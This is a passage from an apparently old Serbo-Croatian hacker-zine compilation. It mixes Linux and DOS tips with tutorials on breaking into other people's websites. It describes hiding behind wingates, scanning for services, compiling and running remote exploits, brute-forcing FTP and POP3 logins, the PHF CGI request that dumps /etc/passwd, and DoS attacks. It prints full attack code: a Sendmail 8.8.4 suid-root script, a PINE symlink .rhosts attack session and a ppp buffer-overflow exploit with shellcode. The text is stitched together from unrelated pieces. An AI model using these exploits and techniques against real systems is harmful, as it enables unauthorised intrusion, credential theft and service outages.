distribucije osim Linuxware i Yggdrasil; trebate li Linux na traci ili
Syquest disku morat ćete se zadovoljiti Craftworks distribucijom.
Programi za administriranje sustava mogu biti ili tekstualni (OpenLinux,
Craftworks, Linuxware, S.u.S.E., Slackware) ili grafički (OpenLinux,
Debian, RedHat, WGS..). Razlike u funkcionalnosti nema, ali su grafički
programi pregledniji i intuitivniji.
Volite li imati i tehničku podrąku, imat ćete ju kupite li OpenLinux,
Craftworks, Linuxware, S.u.S.E., WGS, YGGDRASIL ili komercijalnu
RedHat
distribuciju. U ostalim slučajevima "osuđeni" ste na često efikasniju i
kvalitetniju podrąku - UseNet grupe comp.linux.* - gdje moľete postaviti
8pitanje i uglavnom ćete brzo dočekati odgovor (ili flame). Ne govorite li
engleski, pitanja moľete postaviti i u domaće grupe - hr.comp.linux ili
hr.comp.unix.
===============================================
========
8. ALT 255
-------------------
Da li ste ikada pozeleli da napravite direktorijum kojem skoro niko ne
moze prici. Pa evo od ovoga trenutka mozete ispuniti svoju zelju.
Idite u Dos prompt i dodjite u ROOT direktorijum, tj. otkucajte CD\ i
onda lepo otkucajte MD (ALT + 255). Znaci otkucajte MD pa SPACE pa
onda drzite ALT i otkucajte 255 na desnoj strani tastature i zatim
pustite ALT i pritisnite Enter.I onda lepo napisete CD i opet stisnete
ALT i otkucate 255 na desnoj strani i pustite ALT i enter. Sada mozete
u taj direktorijum stavljati sta god pozelite i ne moze vam tu niko
pristupiti sem nekih malo pametnijih. Ovo svakako isprobajte.
Zaboravih da kazem, ako zelite da obrisete taj direktorijum ukucajte
RD ili RMDIR pa onda SPACE pa drzite ALT pa otkucajte 255 i onda
pustite ALT i pritisnite ENTER.Najbolja fora koju ja koristim jeste da
napravite direktorijum po sledecem postupku: otkucajte MD pa onda
pritisnite ALT i otkucajte 255 i onda pustite ALT i u nastavku otkucajte
nesto proizvoljno npr. backspace i onda ce vam se stvoriti zasticeni
drektorijum koji se zove backspace.Ovo je jedna od nesuglasnica
DOSa i WINDOWSa. Ovo se desava zato sto je kod ALT+255 ustvari
NULL to jest praznina i Windows to ne moze da gleda kao znak i
zato ne moze da pristupi tom direktorijumu. Ovo je isprobano i nijedan
program iz Windowsanije uspeo da pristupi tom direktorijumu, dok na
drugoj strani skoro svi programi za dos uspeli su da pristupe tom
direktorijumu i chak da ga obrishu.
WEB HACK
_-SADRZAJ-_
-Objasnjenje
-Kad ovo procitas...
-Sta je potrebno
-Kako ostati anoniman?
-Shell Account...?
-Malo osnovnih Unix komandi
-Nalazenje informacija o siteu
-Iskoristiti rupu
-Ostalo
_-OBASNJENJE-_
-Ovaj tutorial sam napisao jer mi je dokurrcilo da me svako pita ovakve

stvari "Molim te mi reci kako da unistim ovaj site!","Ajde plz. imam
samo X godina" ili "Ajde molim te unisti ovaj site,jako me nervira
webmaster".
-E sad,sto se tice flame-a,mozete zaboraviiti na to,jer ja znam koliko je
ovo lame,i
napisao sam samo da bi me ostavili na miru.I znam da je ovaj tutorial
los,i da ne bi
trebao da postoji,ali boli me kurac.Vec mi je dosadilo da me 1000 ljudi
pita istu stvar,od
sad cu samo da dam link do ovog tutoriala.ZATO postoji ovo.
-Ja ne odgovaram za ono sto radite posle ccitanja ovog tutoriala,ovaj
tutorial samo govori kako se to radi,ne savetujem vam da to radite.
_-KAD OVO PROCITAS-_
-Kad procitas ovaj tutorial NISI HAKER!!! To treba da bude kristalno

jasno.I nemoj da ides po
forumima i da se kurcis kako si haker jer si deface-ovao neku glupu
stranicu.Necu da objasnjavam
kako postati haker...ima tona tutoriala o tome.I apelujem na vas da |\|
3p|5373 0\/4K0 .
_-STA JE POTREBNO-_
E,za ovaj tutorial nije potrebno imati unix.Mislim,bilo bi mnogo bolje da

imas unix,ali znam da
te mrzi da instaliras... Sve u svemu potrebno je par wingate adresa i
shell account.Bez brige,
objasnicu sta je sta.
Posto i oko ovog ima tona tutoriala,necu zalaziti u
detalje.Uglavnom,wingate je adresa na kojoj
se nalazi programcic koji je veoma slican proxy-u.Postoji mnogo lose
konfigurisanih wingate-a i
to se moze iskoristiti kako bi se postigla neka
anonimnost.Anonimnostcete postici tako sto cete
se povezati preko telnet klijenta.Kasnije o tome.Shell account...sad cu
jako da pojednostavim.
To je kao racun na nekom kompjuteru koji sluzi da biste mogli da
koristite taj kompjuter sa
njegovim uslugama,ali sa odredjenim privilegijama.Ako ovo nije
jasno,onda procitaj recenicu
jos jedno 10 puta,ako ni onda nije jasno,idi u kuhinju,nadji ogroman noz
i ubi se ko siroce.
I trebace jedan port scanner.To je program koji gleda otvorene portove
na nekom racunaru.
Portovi su kao vrata preko kojih se povezes na neki racunar i koristis
usluge.Ako je na primer
otvoren port pod brojem 21,onda to znaci da taj racunar ima FTP
deamon,to je program koji
pruza usluge FTP-a (File transfer protocol). To je ono sto vam treba.
_-KAKO OSTATI ANONIMAN-_
Pa..ne mozes ostati potpuno anoniman.Ali moze se ostati dosta

anoniman (mogu misliti kako je
ovo bilo gramaticki tacno,moj fond reci nije ogromoan,tako da se
izvinjavam).Ja cu reci kako se
moze ostati anoniman preko wingate-a.Postoje mnogi site-ovi na kojima
se moze naci lista
wingate-a, a jedan od takvih site-ova je www.cyberarmy.com/lists
Tamo izaberete wingate,i ima jako puno adresa i portova (pricao sam o
portovima).Recimo da ima
neka ovakva adresa: 213.43.22.11 (lupio sam adresu) koja je na portu
1080.Treba uraditi
sledece:
Pokrenete telnet.To radite tako sto idete na Start,pa Run,i onda upisete
telnet.Pojavice vam se
jedan program,koji bas i nije prelepog dizajna,ali to nije ni vazno.Idete
na Connect i onda
Remote System.
Posle toga u Hostname ukucate adresu na kojoj smo rekli da je
Wingate,u ovom slucaju
213.43.22.11 .U polje port upisite 1080 (to sam rekao da Wingate na toj
adresi radi na tom portu)
.Termtype treba da bude vt100.
I onda pritisnete connect.Sacekate malo i povezace se.Posle toga se
telnetujete na svoj shell
account tako sto upisete nekaadresa.com 23
(23 je telnet port).U mesto 23 mozete da upisete i recimo 21,tako cete
se konektovati na FTP
protokol.Sad ste koliko toliko anonimni.Savetujem da linkujete par
wingate-a.To cete tako raditi
sto cete se umesto da se telnetujete na shell-account,telnetovati na
adresu drugog wingate-a i
tako redom dok vam ne ponestane wingate adresa i onda se konektujete
na shell account.
_-SHELL ACCOUNT-_
Unix je visekorisnicki sistem.To znaci da vise korisnika moze da koristi

isti operativni sistem.
Postoje servisi koji besplatno daju racune na svoj sistem.Jedan od ovih
je npr. luxadmin.org .
Kada dobijete racun ovde moci cete da koristite unix,medjutim sa
ogranicenjima.Imacete racun sa
smanjenim privilegijama i dobicete oko 50 MB u najboljem slucaju.I bice
dosta.Znaci idite na
luxadmin.org i uzmite jedan shell account.Dobicete svoj username i
password.Sada se treba
telnetovati na taj shellaccount kako bi ga uopste mogli koristiti.Znaci
prvo telnet na wingate
i onda....vec sam pisao o tome.
E,kad se telnetujete dobicete prompt za login.Tu ukucate svoj username
i zatim password.Necete
videti dok kucate password zbog zastite.Kada se ulogujete usli ste u svoj
shell account.
_-MALO OSNOVNIH UNIX KOMANDI-_
Savetujem da kupite neku Unix/Linux knjigu i malo proucite.Vredece.

E sad.Da biste videli u kojem se nalazite direktorijumu ukucate ovu
komandu: pwd .Da biste
videli koje fileove imate u direktorijumu ukucajte ovo: ls -al (ovim cete
videti i
privilegije....necu o tome).
Da biste mogli da se krecete kroz direktorijume koristite ove komande:
cd direktorijum (ovim odlazite u zeljeni direktorijum) ,cd .. (izlazite iz
direktorijuma).Da
biste obrisali neki file koristite ovu komandu:
rm file. Ako ocete da obrisete sve u direktorijumu ukucajte ovo: rm *.*
_-NALAZENJE INFORMACIJA O SITE-U-_
Ovo je najvaznija faza kod upadanja u neki site.Postoji vise nacina i

stvari koji se trebaju
otkriti.Treba otkriti Operativni sistem,otvorene portove, deamone i
verzije koji rade na serveru.
--Operativni sistem
-Objasnicu 2 nacina.Prvi je da se telnetujjete na server ako ima otvoren
telnet port 23.Tamo pise
koji je Operativni Sistem.
-Drugi nacin je netcraft.com
Idite na taj site i kliknite na link na kojem pise "Whats that site running"
ili tako nesto.
Idite na taj link i upisite site koji vas zanima.
Tamo ce pisati sta taj site ima.Postoji jos nacina,kao sto je nmap ....ali
bice ovo dosta za vas.
Zatim skenirajte otvorene portove sa port scannerom.

Telnetujte se na svaki port i pogledajte sta pise,koja je verzija
programa,ime....SVE ZAPISITE.
E,kad sve to zavrsite imate dosta informacija o site-u da biste mogli
iskorisiti.
_-ISKORISTITI RUPU-_
E sad.Postoje stvari koje se zovu exploiti.To su programi koji iskoriste

rupu u programu.Sa ovim
exploitima moguce je dobiti root na nekom serveru (root je svemocni
user,ima sve privilegije).
Postoji vise vrsta exploita.Kao sto su Remote (ovo cemo mi koristiti)
,Local i DoS.
Mi cemo koristiti remote.Exploiti su 95% pisani u C-u,a ponekad i u
PERL-u.E sad...posto vec
imamo informacije o site-u ostaje nam da nadjemo exploit i udjemo u
server.Postoje site-ovi
gde se oni mogu naci.
Dva najpoznatija i najbolja site-a su http://packetstorm.securify.com i
http://www.hack.co.za
Tamo nadjite exploit za ono sto ste zapisali.Vazne su verzije programa!
E sad kada ste skinuli exploit i stavili ga na shell account preostaje samo
kompajlirati exploit
i pokrenuti ga.
--Ako je exploit napisam u C-u onda treba uraditi ovo:
gcc file.c -o file
Sada imate kompajliran exploit.Mozete ga pokrenuti sa:
file ili ./file
Sada ce da vam ispise usage.Ako pise recimo: Usage <site> <port>
onda cete ovako startovati exploit:
./file www.nekisite.com 21
Malo sacekate i usli ste.Sada samo koristite ono sto sam vam pokazao u
sekciji o unix komandama.
--Ako je napisan u PERL-u

Ako je napisan u PERL-u nema potrebe za kompajliranjem,jer je PERL
interpretiran jezik
(ako ne znate nista o programiranju...onda ni ovo ne znate).Znaci samo
startujete sa:
perl file.pl
Onda ce vam opet ispisati Usage,i opet ista prica.
*-*-*-*-*--- Hacking Web-site --*-*-*-*-*-

*-*-*-*-*-*
* Mnogo ljudi me je pitalo kako hacknuti web stranicu (neki su

malo pretjerali pa su pitali kako hacknut Altavista.com, Yahoo, Hotmail
itd.. a ako i vi tako nesto zelite onda se kanite compa nije to za vas,
slupajte ga popijte mu krv radite sta hocete).
Naime, kada ovaj text procitate niste hacker jer haker nemozete
tako lahko postat i nemoj da se ku*cite kako ste nesto hacknuli samo
sto ste procitali text. Ovaj tutorial je napisan da vam pojasni i nauci
a ne da vi procitate i onda se ku*cite da ste hacker.
Manje price i krenimo.
Sada kada ste skontali vasu metu (nadam se da nije Yahoo a ako jest
znate sta cete :))
onda mozemo krenut.
1. Faza
Sajt koji zelite da hacknete, prvo morate
saznat na kojem je serveru i koji je Operativni system.
Logicno je ako je server IIS Microsoft da ce biti operativni system
Win a ne Linux ili nesto drugo. Prvo naucite te vrste servera i operativnih
systema.
Kako to saznat?
Ima milion programa sto to rade a neki od njih su NMAP, Queso itd...
Da vi sad ne bih skidali (uuuh valja naci i skinuti programe :)) odite
na www.netcraft.com i lijepo fino upisite adresu web sajta kojeg zelite
hacknut.
Onda cete dobit sta vam treba. Kada ste to vidjeli, znate sta da radite.
Ako je server Apache i OS Linux, nemojte se previse nadat da cete
hacknut
jer Linux je ako nista sigurniji od Windowsa. Naravno ima exploita
i na njemu ali to vama prepustam da sami nadjete exploite na
nekim hack sajtovima. E ako je IIS Microfost server i to verzija 4.0
onda je to druga prica. Zaista ima hrpa exploita za taj server
i ja znam neke medjutim imajte u vidu da je administrator mozda
zakrpio te rupe. Ova faza je samo uvod, da vidite kakve su to vrste
servera
i OS.
2.Faza
E ako se opredjelite za 1. fazu, onda ovu drugu nemojte ni citat.
Ako se opredjelite za 1. fazu, onda cete trebat trazit exploite
za server na kojem je ta vasa stranica koju trebate
hacnkut. To je i dug proces ali ako se razumijete i znate
sta su exploiti i malo oko njih, onda vam nece biti tesko naci.
E glavna metoda za 1. fazu jeste da skenirate taj server.
Medjuti to je samo jedan dio posla, ali tu vam je dosta toga uradjeno.
Naime, kada skenirate server, onda mozete vidjeti koji exploiti
postoje na njemu! I to je to. Nadjete exploit taj i taj i
isprobate ga. Sad bi vi rekli "E jebote lahko je reci da treba skenirat,
al kako?". Fino, imate milion Exploit skenera, neke mozete skinuti i
na www.nhs-ac.cjb.net sajtu a preporucujem N-Stealth skener.
Trazi ga na Astalavista.com
Da se mi vratimo drugoj fazi.
Ovdje cak nemorate ni znat koji je server i koji je OS.
Sve sto trebate jeste da vidite koji su portovi otvoreni na
tom serveru. Lijepo fino uzmite port skener i skenirajte host
ako to neznate nemojte ni citat dalje ovaj tutorial, jednostavno ga
izbriste. IP adresu takodjer mozete doznat na stranici www.netcraft.com
E postoji jedna dobro poznata metoda. Naime, ako je otvoren
port 21 tj. FTP i ako se mozete ulogovat kao anonimni korisnik, onda sve
sto trebate jeste da pogledate u direktorij /etc/passwd naravno
ako je to dopusteno. Ako je dopusteno i ako uspijte doci do toga
posao je zavrsen, znate sta trebate dalje :)) Medjutim ako to nije
moguce
ako se nemozete ulogovat ili nesto drugo, pogledajte koji
su portovi otvoreni kada skenirate. Sada morate znati malo o
protokolima a imate neke tutore o tome na www.nhs-ac.cjb.net sajtu.
Takodjer bitno je doci do administratorske stranice a ona je obicno
na portu 6075. Naravno trebate naci tu stranicu i port, probajte jos
sa: 65534, 6073, 1260, 5555, 1234 itd...
Ako nadjete taj port, u vas browser upisite (primjer):
http://123.122.34.233:6075
E da se mi vratimo FTP-u. Ako je taj port uopste otvoren onda
lijeo fino skinete wwwhack alat i izaberete FTP metodu. Program ce
onda probat probit user i pass a uzimace rijeci iz rijecnika.
Preporucujem da izaberete metodu sve moguce kombinacije ali to ce
zaista
dugo trajat. Bilo kako bilo, znate sta treba da radite, imate mnogo izbora
pa bujrum.
3. Faza
Ova faza je povezana sa drugom. Naime ako na stranici postoji
POP3 otvoren port, onda isto korstite wwwhack kao i kod
FTP-a. Naravno program ce vas o svemu obavjestiti kada sta otkrije.
4. Faza
U ovoj fazi vam ne treba nista samo program :))
Ovdje cemo korisit DoS napade. Ko nezna sta je to, neka
skine tutor o tome na nhs-ac sajtu i nauci to.
Medjutim sa ovom tehnikom mozete samo "oborit" server.
Ipak, procitajte o tome u posebnom tutoru.
Hackanje Sifre putem ftp.
Pokazat cu vam laksi put kako uz ftp access preuzmete password i login
name od neprijatelja.
Ali prvo naucite nesto o file passwordu Kako izgleda primjer
root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom
Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh
Ovako izgleda pravi password file koji ce vam dati root
root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp
Ovako bih izgledao drugi primjer poznatog sjena file
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-
uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper
Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
Sjena password ima "x" a ponekda moze biti

*
Sada kad znate nesto malo o formaciji password formata
Sad mozemo govoriti kako crackati server
I vazno za napomentu da je postupak veoma lak. 1.Prvi korak je

download i copiraj file. 2. Drugi korak je da nadjete dobar crack
programcic kao sto je
Cracker Jack, John the
Ripper, Brute Force Cracker, or Jack the Ripper. Znaci cim startate
program prvo sto ce da pita je password
Password file mozete napraviti tako sto ce te download vec gotove
pakete sa neta ili ce te ga sloziti u formaciju(ASCII, caps,
lowercase, and numeric letters may also be added) . kad dobijete trazeni
password sljedite direkcije crack-a
ovdje su vam serveri za pronalazak.....fileova
http://webpage_goes_here/cgi-
bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
dajem primjer
da bih pw file za http://www.webpage.com/ treba da ukucas
http://www.webpage.com/cgi-
bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
samo ih copiraj i plasiraj u crack
Telnet i Exploits
ako govorimo o exploits to je najlaksi nacin hackanja web stranice

Ali prije nego sto bih ti pokrenu exploit potrebno ti je
da imas telnet proggie,
samo skrecem paznju na bug i errors koji se javljaju koji ce vam stvoriti
problema do root access.
root access.
poznati exploit Sendmail v.8.8.4

It creates a suid program /tmp/x that calls shell as root. Ovako treba da
izgleda kad ga nastimate
cat << _EOF_ >/tmp/x.c

#define RUN "/bin/ksh"
#include<stdio.h>
main()
{
execl(RUN,RUN,NULL);
}
_EOF_
#
cat << _EOF_ >/tmp/spawnfish.c
main()
{
execl("/usr/lib/sendmail","/tmp/smtpd",0);
}
_EOF_
#
cat << _EOF_ >/tmp/smtpd.c
main()
{
setuid(0); setgid(0);
system("chown root /tmp/x ;chmod 4755 /tmp/x");
}
_EOF_
#
#
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]
*"// |cut -d" " -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd
/tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
echo "leet..."
/tmp/x
fi
Ovo je pine exploit namjenjen za linux potrebu
Creating a symbolic link from /tmp/.hamors_lockfile to

~hamors/.rhosts(for a generic
example) will cause PINE to create ~hamors/.rhosts as a 666 file with
PINE's process id
as its contents. One may now simply do an echo "+ +" >
/tmp/.hamors_lockfile, then rm
/tmp/.hamors_lockfile.
hamors (21 19:04) litterbox:~> pine
catluvr (6 19:06) litterbox:~> ps -aux | grep pine

catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine
hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine
catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors

- -rw-rw-rw- 1 hamors elite 4 Aug 26 19:055 .302.f5a4

catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts

/tmp/.302.f5a4
hamors (23 19:09) litterbox:~> pine

hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine
catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4
catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4

++
catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4
catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors
da vas nebih zbunilo ovo nije FreeBSD

FreeBSD-SA-96:15. Ovako bih trebalo da izgleda kad nastimate
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define BUFFER_SIZE 156 /* velicina bufer-a */
#define OFFSET -290 /broj bufera kad ga pokrenete */
long get_esp(void) { __asm__("movl %esp,%eax\n"); }

main(int argc, char *argv[])
{
char *buf = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
char execshell[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x
56\x0f" /* 16 bytes */
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\x
ca\x52" /* 16 bytes */
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x
01" /* 20 bytes */
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x
04"; /* 15 bytes, 57 total */
int i,j;
buf = malloc(4096);
/* puno startanje bufera sa nops */
i = BUFFER_SIZE-strlen(execshell);
memset(buf, 0x90, i);

ptr = buf + i;
/* ubaci exploit code u bufer */
for(i = 0; i < strlen(execshell); i++)

*ptr++ = execshell[i];
addr_ptr = (long *)ptr;

for(i=0;i < (104/4); i++)
*addr_ptr++ = get_esp() + OFFSET;
ptr = (char *)addr_ptr;

*ptr = 0;
setenv("HOME", buf, 1);
execl("/usr/sbin/ppp", "ppp", NULL);

}
*-*-*-*--- Komande u MS-DOS ---*-*-*-*
* MS-DOS. Mislim da nema potrebe da objasnjavam sta je to

a ko nezna neka odmah izbrise ovaj tutorial jer to nije za njega :))
Posto ja jako volim DOS morao sam napisat nesto o njemu :))
Naime u ovom tutoru cete nauciti osnovne MS-DOS komande i malo
objasnjenje.
* Komande
* CD - Sluzi da se pozicionirate na odredjeni direktorij

Primjer: c:\> cd garnet
* COPY - Sluzi da kopiranje fajlova

Primjer: c:\> copy c:*.* a: -kopira cijeli sadrzaj sa C: na disketu A:
Primjer: c:\> copy c:garnet.exe a: -kopira fajl garnet.exe na A:
Primjer: c:\> copy c:\windows\garnet.exe c:\dos -kopira fajl garnet.exe
u DOS direktorij
Primjer: c:\> copy a:*.* c: -kopira cijeli sadrzaj sa diskete na C:
* DEL - Brisanje fajlova

Primjer: c:\> del *.* -brise sve fajlove na C:
Primjer: c:\> del garnet.exe -brise fajl garnet.exe
Primjer: c:\> del *.exe -brise sve datoteke EXE na C:
* DIR -Izlistava fajlove i direktorije

Primjer: c:\> dir -izlistava fajlove i direktoje na C:
Primjer: c:\> dir/p -izlistava postepeno fajlove i direktorije
Primjer: c:\> dir/w -izlistava fajlove i direktorije u drugom formatu
Primjer: c:\> dir/s -izlistava sve direktoje i fajlove na cijelome hard
disku
* MK (MKDIR) - Kreiranje direktorija

Primjer: c:\> mk garnet -kreira direktorij garnet
* RM (RMDIR)
Primjer: c:\> rm garnet -brise direktorij garnet
* COPY CON - Kreiranje fajla

Primjer: c:\> copy con garnet.txt -Kreira fajl garnet.exe
(kada unesete komandu i pritisnete ENTER, unesite text u taj fajl
i kad zavrsite pritisnite tipku F6 i snimicete text koji ste unijeli u taj
fajl)
* REM - Komentar
Primjer: c:\> rem garnet i nhs-ac.cjb.net -nista posebno :))
* PAUSE - Pauza
Primjer: c:\> pause -za daljni radi pritisnite ENTER
* DATE - Ispis datuma

Primjer: c:\> date
* TIME - Ispis vremena

Primjer: c:\> time
* TYPE - Ispis sadrzaja fajla

Primjer: c:\> type garnet.txt -ispisuje sadrzaj fajla garnet.txt
* ATTRIB - Zastita fajlova

Primjer: c:\> attrib garnet.exe +h -sakriva fajl garnet.exe "Hiden"
Primjer: c:\> attrib garnet.exe +r -zasticuje garnet.exe od editovanja
"Read only"
(Ako zelite odkljucati fajl, onda umjesto "+", stavite "-")
* ECHO - Ispis teksta

Primjer: c:\> echo on -pokazuje tekst
Primjer: c:\> echo off -sakriva tekst
* /? - Help
(Za svaku ovu komandu mozete upisat /? i dobit cete
pomoc za tu komandu)
Primjer: c:\> attrib /?
Sta su to DoS napadi i vrste DoS napada
* U ovom slucaju rijec DoS neznaci onaj Microsoft MS-DOS, ova

skracenica znaci:
"Denial of Service". Glavni cilj ovih napada jeste da "uguse" konekciju i
time
obore odredjenu masinu. Kako to rade, ima mnogo nacina ali glavni cilj
je
onemoguciti funkciju odredjene masine, jednostavno onesposobiti je.
Sve u svemu tehnika ovih napada jeste da se sto vise paketa posalje na
odredjenu
masinu i time onesposobi. To se vrsi na mnogo nacina koje cete nauciti u
sljedecim
tekstovima. Samo da napomenem da niste haker ako koristite neke
nukkere koji
rade na ovom principu i hvalite se kako ste nekoga nukovali. Ako nesto
zelite nauciti pa
kasnije to odraditi, onda prvo morate shvatiti pa tek onda nesto uradit iz
toga sto
naucite. Zato prvo shvatite funkciju i "gradju" nukkera pa tek onda
"uzmite u ruke".
Problem je u tome sto se veoma tesko moze zastitit od ovih vrsta napada
jer se
jednostavno koriste normnalne systemske komande.
Evo vam sad vrste DoS napada i malo objasnjenje za svaku.
* Land
Ovdje se radi o takvom napadu sto salje na otvoreni port SYN paket koji
moze
da system obori.
* Smurf-napadi
Ovdje se salje sto vise pingova da bi se dobio sto veci broj odgovora i
tako
bi srusio system zrtve. Za 100 pingova dobija se 1000 odgovora.
* OOB-napadi
* Kao i sto svi znate ovaj napad je najpoznatiji a i najednostavniji.

Medjutim radi samo
na Win 95 dok je Win 98 zasticen od ovog napada. Njegova funkcija je u
tome sto
salje neke bezvezne znakove na odredjenu masinu i dovodi do Blue
screen of death
(ako neznate sta je Blue screnn of death, mozete procitat u ovom
tutorialu)
* SYN flood
* Jedna TCP konekcija između dva sistema ostvaruje se preko tkz.

"three-way-handshake".
1) Sistem A---->Sistem B : SYN ("Hoću vezu s tobom")
2) Sistem B---->Sistem A : ACK/SYN ("Dobro uzeo sam to uobzir)
3) Sistem A---->Sistem B : ACK ("Dobro,ja se također slažem")
Sad se jednostavno u jednom SYN paketu daje pogrešna adresa (jedna

koja i nepostoji),
i time ne dolazi na sisitem B- paketa odgovor (ACK), jer i nepostoji
adresa.
Ali sistem B čeka još određeno vrijeme na odgovo, sve dok ne dođe
"connection timeout".
U tom vremenu se mora sistem B sa što više ping-ova prenapuniti.
Posljedica je da se
sisitem B prenapuni, tako da za određeno vrijeme više ni na jedan SYN-
paket odgovori.
* Ping of Death
* Za ovaj napad sluzi obicna komanda koja glasi: "ping adresa -n

9999999"
Kada se posalje ova naredba na odredjeni server, onda on pocinje da
obradjuje, ali
posto se poslalo oko milion pingova, onda server sporo obradjuje i
jednostavno se
srusi, dolazi do Buffer Overflow.
Medjutim za ove napade je davno izasao patch i nevazi na jacim
serverima.
(Nemoze te koristit ovaj napad sa slabijim mashinama)
* To bi bilo to, jos samo da napomenen ono sto sam rekao na pocetku a
to je da
se veoma tesko zastitit od ovakvih napada. Zato nabavite zastitu da vas
lameri
neuznemiravaju bezze :))
*-*-*-*--- Programi u MS-DOS-u --*-*-*-*
* MS-DOS. Mislim da nema potrebe da objasnjavam sta je to

a ko nezna neka odmah izbrise ovaj tutorial jer to nije za njega :))
Posto ja jako volim DOS morao sam napisat nesto o njemu :))
E sigurno znate ako nista barem osnovne komande u MS-DOS-u a ucili
ste ih
i u osnovnoj skoli. (cd.. copy,del,rd itd...)
Medjutim MS-DOS sadrzi mnogo programa a nekih od njih su glavni
hakerski
alati. Ti programi su legalne vrste medjutim haker ih koriste za
razna ispitivanja i pronalazenja informacija o nekoj zrtvi.
U ovom tutorialu cu opisat par programa i otkriti njihove male tajne.
* Program NET
Ovo je svima poznat program u MS-DOS-u.

Ove programe sve mozete naci u C:\Windows
Medjutim ako imate Win98 postoji mogucnost da se ti programi ne
nalaze tu.
Znaci ako imate Win98 pogledajte u Windows direktorij Zip fajlove:
Net7.zip, Net8.zip, Net9.zip i Net10.zip. U nekim tim arhivama naci cete
i ostale programe pored programa NET.
Program NET ima mnogo funkcija. Preko njega mozete da ulazite
u direktorij na drugim racunarima naravno ako je to dozvoljeno ali sad
je to druga prica.
Evo vam objasnjenje za komande u NET:
NET CONFIG Displays your current workgroup settings.

NET DIAG Runs the Microsoft Network Diagnostics program to
display diagnostic information about your network.
NET HELP Provides information about commands and
error messages.
NET INIT Loads protocol and network-adapter drivers without
binding them to Protocol Manager.
NET LOGOFF Breaks the connection between your computer and
the shared resources to which it is connected.
NET LOGON Identifies you as a member of a workgroup.
NET PASSWORD Changes your logon password.
NET PRINT Displays information about print queues
and controls print jobs.
NET START Starts services.
NET STOP Stops services.
NET TIME Displays the time on or synchronizes your computer's
clock with the clock on a Microsoft Windows for
Workgroups, Windows NT, Windows 95, or NetWare time server.
NET USE Connects to or disconnects from a shared
resource or displays information about
connections.
NET VER Displays the type and version number of the
workgroup redirector you are using.
NET VIEW Displays a list of computers that share
resources or a list of shared resources
on a specific computer.
* Program NBTSTAT
Ovaj program vam takodjer ima mnogo opcija.

Pomocu njega mozete da vidite da li je na nekom racunaru
otvoren port 139 NetBIOS.
To mozete uraditi ovako:
c:\> nbtstat -A 195.222.45.22
Evo vam i help sa prevodom za NBTSTAT:
Nbtstat [-a remoteime] [-A ip adresa] [-c] [-n] [-R] [-r] [-S]
[-s]
Switchevi : -a Izlista imena remote kompjutera po tabeli zadanoj za host

ime.
-A Izlista imena remote kompjutera po tabeeli zadanoj po
ip adresama
-c Izlista remote ime cache ukljucujuci ipp adresu.
-n Izlista lokalna NetBIOS imena
-r Izlista imena dobijna emitirane putem WWINS
-R Uzima i realod remote cache tabelu....<
-S Izlista sessione tabele sa destinacijomm IP
adresama
-s Izlista sessione tabele konverzije...
* Ping
Ovu komandu dobro znate.

Pomocu nje doznajete da li neka IP adresa postoji na internetu.
Npr: c:\> ping 195.222.45.22
* u MS-DOS-u programa ima zaista puno ali ja sam opisao samo 3,

barem su
ova osnovna. Za svaki ovaj program upisite /? ako zelite dobiti kratki
help.
Npr: C:\> ping /?
Uvod u Svijet Cracking-a
Uvod:
Sta je Cracking?
Cracking je jedna vrsta expresije.Ako hoces crack-ovati mozes uvidjeti
da nije lako
razumijeti ispocetka neke osnovne tocke crackinga ali nakon sto ih
razumis imaces potrebno znanje i iskustvo za daljnje usavrsavanje
crackinga.
Ovaj text ce objasniti neke osnovne tacke crackinga,nadam se da cete
razumijeti nacin na koji cu neke tacke objasniti.
Korak 1:
Ovaj text je napravljen za sve pocetnike na netu koji nerazumiju ili
neznaju nista
o ASM-Codu ili o internalnoj funkciji aplikacije.
Potrebni Software:
